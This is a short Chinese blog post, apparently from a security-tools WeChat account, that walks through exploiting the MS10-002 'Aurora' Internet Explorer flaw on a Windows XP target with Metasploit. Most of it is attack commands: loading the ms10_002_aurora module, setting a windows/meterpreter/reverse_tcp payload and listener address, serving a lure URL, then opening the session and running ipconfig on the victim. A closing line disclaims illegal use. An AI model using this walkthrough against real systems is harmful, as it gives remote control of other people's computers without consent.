我们总以为,是生活欠我们一个满意,其实,是我们欠生活一个努力。。。。
---- 网易云热评
一、漏洞介绍
ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权,。
二、攻击过程(目标主机是xp系统)
1、启动msf,搜索ms10_002
search ms10_002
2、选择模块use exploit/windows/browser/ms10_002_aurora
3、设置payload,set payload windows/meterpreter/reverse_tcp
4、查看需要设置的参数
show options
5、设置监听的ip地址,set LHOST 192.168.1.133
6、攻击run
7、只要目标主机访问该连接,我们就可以获取该主机的控制权限
http://192.168.1.133:8080/cZQri76QWY9OhwC
8、指定要控制的目标主机:sessions -i 1
9、输入ipconfig,获取目标主机相关信息
禁止非法,后果自负
欢迎关注公众号:web安全工具库